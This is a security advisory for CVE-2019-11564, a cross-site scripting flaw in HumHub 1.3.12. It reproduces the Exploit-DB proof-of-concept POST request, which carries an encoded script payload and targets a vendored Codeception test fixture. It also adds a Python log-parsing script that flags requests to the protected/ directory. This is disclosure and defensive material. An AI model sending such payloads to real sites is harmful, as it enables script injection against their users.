Vendor: HumHub
By: Kağan EĞLENCE
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-Site Scripting)
Product Name: HumHub
Affected Version From: 1.3.12
Affected Version To: 1.3.12
Patch Exists: YES
Related CVE: CVE-2019-11564
CPE: a:humhub:humhub:1.3.12
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
Year: 2019

HumHub 1.3.12 – Cross-Site Scripting

HumHub version 1.3.12 is vulnerable to Cross-Site Scripting (XSS). An attacker can inject JavaScript through a POST parameter sent to an index.php file shipped under the application's protected/vendor/ directory (a Codeception test fixture; see the exploit details below). The injected code is reflected into the response and executes in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Upgrade to the latest version of HumHub (1.3.13) to mitigate this vulnerability.

Exploit-DB raw data:

# Exploit Title: HumHub 1.3.12 - Cross-Site Scripting
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://humhub.org/
# Version: 1.3.12
# CVE : CVE-2019-11564


URL: http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
Vulnerable File: /protected/vendor/codeception/codeception/tests/data/app/view/index.php
Request Type: POST


#Request Example:
=============

    POST /humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 64
    Connection: close
    Cookie: xxxx
    Upgrade-Insecure-Requests: 1

    %3Cscript%3Ealert%28%22Vulnerable%22%29%3C%2Fscript%3E=undefined

### History
=============
2019-4-10  Issue discovered
2019-4-10  Vendor contacted
2019-4-10  Vendor response and hotfix
2019-4-27  Advisory release
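The payload in the request above travels in the POST body, which web-server access logs do not record, so the dependable signal for a defender is the path itself: HumHub's protected/ tree (config, runtime, vendored code including Codeception test fixtures such as this index.php) is not meant to be web-accessible at all. The following Python script is an added example, not part of the advisory, that parses constructed combined-format log lines and flags every request that reached protected/, noting whether the server actually served the file (a 2xx/3xx response) or correctly refused it; the IPs, timestamps and log lines are all constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not from the advisory).
# Line 2 mirrors the advisory's request: a POST to the Codeception test
# fixture under protected/vendor/ that the server answered with 200.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2019:10:00:01 +0000] "GET /humhub-1.3.12/index.php?r=dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2019:10:00:02 +0000] "POST /humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php HTTP/1.1" 200 812 "http://localhost/" "Mozilla/5.0"
203.0.113.9 - - [10/Apr/2019:10:00:03 +0000] "GET /humhub-1.3.12/protected/config/common.php HTTP/1.1" 403 199 "-" "curl/7.64.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Any path segment sequence ending in protected/ (HumHub may sit in a subdirectory).
PROTECTED_RE = re.compile(r'^/(?:[^/?]+/)*protected/')

def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode the path and drop the query string so PROTECTED_RE sees the real path.
    rec['path'] = unquote(rec['target'].split('?', 1)[0])
    rec['status'] = int(rec['status'])
    return rec

def find_exposed_protected(log_text):
    """Flag every request whose path lies under protected/."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and PROTECTED_RE.match(rec['path']):
            findings.append({
                'ip': rec['ip'], 'method': rec['method'], 'path': rec['path'],
                'status': rec['status'],
                # A response below 400 means the web server handed the file out:
                # the deny rule for protected/ is missing or ineffective.
                'served': rec['status'] < 400,
                # Vendored test fixtures should not even be deployed, let alone served.
                'test_fixture': '/vendor/' in rec['path'] and '/tests/' in rec['path'],
            })
    return findings

if __name__ == '__main__':
    for finding in find_exposed_protected(SAMPLE_LOG):
        print(finding)
```

A finding with served=True is a deployment misconfiguration to fix at the web server regardless of which HumHub version is installed; upgrading to 1.3.13 addresses the XSS but the deny rule for protected/ is what keeps the rest of that tree out of reach.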